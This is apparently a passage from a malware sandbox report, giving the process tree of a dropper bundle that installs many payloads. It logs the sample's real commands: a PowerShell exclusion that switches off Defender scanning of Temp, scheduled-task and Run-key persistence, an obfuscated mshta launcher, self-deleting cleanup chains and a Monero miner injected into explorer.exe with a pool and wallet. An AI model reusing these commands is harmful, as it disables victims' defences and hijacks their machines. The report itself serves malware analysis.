1960 setup_installer.exe 29 PID 1608 wrote to memory of 612 1608 setup_install.exe 33 PID 1608 wrote to memory of 612 1608 setup_install.exe 33 PID 1608 wrote to memory of 612 1608 setup_install.exe 33 PID 1608 wrote to memory of 612 1608 setup_install.exe 33 PID 1608 wrote to memory of 612 1608 setup_install.exe 33 PID 1608 wrote to memory of 612 1608 setup_install.exe 33 PID 1608 wrote to memory of 612 1608 setup_install.exe 33 PID 1608 wrote to memory of 1640 1608 setup_install.exe 34 PID 1608 wrote to memory of 1640 1608 setup_install.exe 34 PID 1608 wrote to memory of 1640 1608 setup_install.exe 34 PID 1608 wrote to memory of 1640 1608 setup_install.exe 34 PID 1608 wrote to memory of 1640 1608 setup_install.exe 34 PID 1608 wrote to memory of 1640 1608 setup_install.exe 34 PID 1608 wrote to memory of 1640 1608 setup_install.exe 34 PID 1608 wrote to memory of 1908 1608 setup_install.exe 35 PID 1608 wrote to memory of 1908 1608 setup_install.exe 35 PID 1608 wrote to memory of 1908 1608 setup_install.exe 35 PID 1608 wrote to memory of 1908 1608 setup_install.exe 35 PID 1608 wrote to memory of 1908 1608 setup_install.exe 35 PID 1608 wrote to memory of 1908 1608 setup_install.exe 35 PID 1608 wrote to memory of 1908 1608 setup_install.exe 35 PID 1608 wrote to memory of 1680 1608 setup_install.exe 36 PID 1608 wrote to memory of 1680 1608 setup_install.exe 36 PID 1608 wrote to memory of 1680 1608 setup_install.exe 36 PID 1608 wrote to memory of 1680 1608 setup_install.exe 36 PID 1608 wrote to memory of 1680 1608 setup_install.exe 36 PID 1608 wrote to memory of 1680 1608 setup_install.exe 36 PID 1608 wrote to memory of 1680 1608 setup_install.exe 36 PID 1608 wrote to memory of 1292 1608 setup_install.exe 37 PID 1608 wrote to memory of 1292 1608 setup_install.exe 37 PID 1608 wrote to memory of 1292 1608 setup_install.exe 37 PID 1608 wrote to memory of 1292 1608 setup_install.exe 37 PID 1608 wrote to memory of 1292 1608 setup_install.exe 37 PID 1608 wrote to memory of 1292 1608 setup_install.exe 37 PID 1608 wrote to memory of 1292 1608 setup_install.exe 37 PID 612 wrote to memory of 788 612 cmd.exe 38 PID 612 wrote to memory of 788 612 cmd.exe 38 PID 612 wrote to memory of 788 612 cmd.exe 38 PID 612 wrote to memory of 788 612 cmd.exe 38 PID 612 wrote to memory of 788 612 cmd.exe 38 PID 612 wrote to memory of 788 612 cmd.exe 38 PID 612 wrote to memory of 788 612 cmd.exe 38 PID 1608 wrote to memory of 820 1608 setup_install.exe 39 PID 1608 wrote to memory of 820 1608 setup_install.exe 39 PID 1608 wrote to memory of 820 1608 setup_install.exe 39 PID 1608 wrote to memory of 820 1608 setup_install.exe 39 PID 1608 wrote to memory of 820 1608 setup_install.exe 39 PID 1608 wrote to memory of 820 1608 setup_install.exe 39 PID 1608 wrote to memory of 820 1608 setup_install.exe 39 PID 1608 wrote to memory of 968 1608 setup_install.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe4⤵
- Loads dropped DLL
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun05ac1b0207d3ff3b8.exeSun05ac1b0207d3ff3b8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sun05ac1b0207d3ff3b8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun05ac1b0207d3ff3b8.exe" & del C:\ProgramData\*.dll & exit6⤵PID:2532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sun05ac1b0207d3ff3b8.exe /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:2360
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe4⤵
- Loads dropped DLL
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun052bbd8bebd9.exeSun052bbd8bebd9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05532f7abc.exe4⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun05532f7abc.exeSun05532f7abc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe4⤵
- Loads dropped DLL
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun05640630a6aa.exeSun05640630a6aa.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe4⤵
- Loads dropped DLL
PID:820 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun059375dac544fc4a.exeSun059375dac544fc4a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2828 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:2984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2496
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2400
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2784 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:2368
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:3144
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
PID:3112
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:3688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3012 -
C:\ProgramData\5502626.exe"C:\ProgramData\5502626.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2256 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2256 -s 17329⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:3020
-
-
-
C:\ProgramData\949770.exe"C:\ProgramData\949770.exe"8⤵
- Executes dropped EXE
PID:2484
-
-
C:\ProgramData\6753134.exe"C:\ProgramData\6753134.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2628 -
C:\ProgramData\6753134.exe"C:\ProgramData\6753134.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 7129⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2664
-
-
-
C:\ProgramData\2489767.exe"C:\ProgramData\2489767.exe"8⤵
- Executes dropped EXE
PID:3052 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\2489767.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\2489767.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))9⤵PID:2244
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\2489767.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\2489767.exe") do taskkill -Im "%~nxl" /F10⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exEC3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw911⤵
- Executes dropped EXE
PID:2068 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))12⤵PID:3044
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F13⤵PID:2372
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY12⤵PID:672
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "2489767.exe" /F11⤵
- Kills process with taskkill
PID:1732
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY9⤵PID:2352
-
-
-
C:\ProgramData\4604564.exe"C:\ProgramData\4604564.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2156 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 16889⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 840 -s 13768⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:2040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2892
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
PID:1812
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
PID:2672 -
C:\Users\Admin\AppData\Local\Temp\is-CC34L.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-CC34L.tmp\setup_2.tmp" /SL5="$201B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:1832 -
C:\Users\Admin\AppData\Local\Temp\is-71L42.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-71L42.tmp\setup_2.tmp" /SL5="$10222,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:328 -
C:\Users\Admin\AppData\Local\Temp\is-PP918.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-PP918.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2712 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:1856
-
C:\Users\Admin\AppData\Local\Temp\V4lKmhz9b.exe"C:\Users\Admin\AppData\Local\Temp\V4lKmhz9b.exe"13⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im V4lKmhz9b.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\V4lKmhz9b.exe" & del C:\ProgramData\*.dll & exit14⤵PID:3380
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im V4lKmhz9b.exe /f15⤵
- Kills process with taskkill
PID:3436
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 615⤵
- Delays execution with timeout.exe
PID:3520
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2vyzj2c7J.exe"C:\Users\Admin\AppData\Local\Temp\2vyzj2c7J.exe"13⤵PID:3244
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe4⤵
- Loads dropped DLL
PID:968 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun05d60bc3b96248e5.exeSun05d60bc3b96248e5.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:876 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2728
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe4⤵
- Loads dropped DLL
PID:1164 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun050462125c7d35.exeSun050462125c7d35.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428 -
C:\ProgramData\5301299.exe"C:\ProgramData\5301299.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2860 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2860 -s 8447⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2380
-
-
-
C:\ProgramData\7193947.exe"C:\ProgramData\7193947.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2956 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:2248
-
-
-
C:\ProgramData\2598751.exe"C:\ProgramData\2598751.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\ProgramData\7848138.exe"C:\ProgramData\7848138.exe"6⤵
- Executes dropped EXE
PID:2032
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe4⤵
- Loads dropped DLL
PID:1612 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun054fe19a12cb3.exeSun054fe19a12cb3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:648 -
C:\Users\Admin\AppData\Local\Temp\is-C5HHC.tmp\Sun054fe19a12cb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-C5HHC.tmp\Sun054fe19a12cb3.tmp" /SL5="$70132,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun054fe19a12cb3.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\is-0JCER.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-0JCER.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2708 -
C:\Program Files\Windows Defender\JKHCIHQGJV\ultramediaburner.exe"C:\Program Files\Windows Defender\JKHCIHQGJV\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\is-VUMDV.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-VUMDV.tmp\ultramediaburner.tmp" /SL5="$102BE,281924,62464,C:\Program Files\Windows Defender\JKHCIHQGJV\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2744 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
PID:2356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\59-db874-694-51f98-f27b331ffe6fb\Davojakuny.exe"C:\Users\Admin\AppData\Local\Temp\59-db874-694-51f98-f27b331ffe6fb\Davojakuny.exe"8⤵
- Executes dropped EXE
PID:2120 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2552 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2640
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1389579 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2008
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1848332 /prefetch:210⤵PID:1532
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1848346 /prefetch:210⤵PID:8520
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1913897 /prefetch:210⤵PID:648
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:996404 /prefetch:210⤵PID:8284
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3728 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3728 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4028
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3492
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:8484
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:8468
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:980
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵PID:8968
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=39⤵PID:3444
-
-
-
C:\Users\Admin\AppData\Local\Temp\45-4ce64-fa9-c0194-133f8d67a6dd3\Paedawucuju.exe"C:\Users\Admin\AppData\Local\Temp\45-4ce64-fa9-c0194-133f8d67a6dd3\Paedawucuju.exe"8⤵
- Executes dropped EXE
PID:2576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fqyakpfr.x2s\GcleanerEU.exe /eufive & exit9⤵PID:3468
-
C:\Users\Admin\AppData\Local\Temp\fqyakpfr.x2s\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\fqyakpfr.x2s\GcleanerEU.exe /eufive10⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\fqyakpfr.x2s\GcleanerEU.exe" & exit11⤵PID:3004
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fbd2prt5.mfm\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:3352
-
C:\Users\Admin\AppData\Local\Temp\fbd2prt5.mfm\installer.exeC:\Users\Admin\AppData\Local\Temp\fbd2prt5.mfm\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:3244 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fbd2prt5.mfm\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fbd2prt5.mfm\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631171227 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:3476
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vg4os254.hh5\anyname.exe & exit9⤵PID:3620
-
C:\Users\Admin\AppData\Local\Temp\vg4os254.hh5\anyname.exeC:\Users\Admin\AppData\Local\Temp\vg4os254.hh5\anyname.exe10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eot10a2e.21x\gcleaner.exe /mixfive & exit9⤵PID:3712
-
C:\Users\Admin\AppData\Local\Temp\eot10a2e.21x\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\eot10a2e.21x\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\eot10a2e.21x\gcleaner.exe" & exit11⤵PID:1648
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:2316
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g5gd4t0u.pzw\autosubplayer.exe /S & exit9⤵PID:1912
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe4⤵
- Loads dropped DLL
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun05899db881f67fb29.exeSun05899db881f67fb29.exe5⤵
- Executes dropped EXE
PID:268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone4⤵
- Loads dropped DLL
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun05fa3b4d2ae56e.exeSun05fa3b4d2ae56e.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1112 -
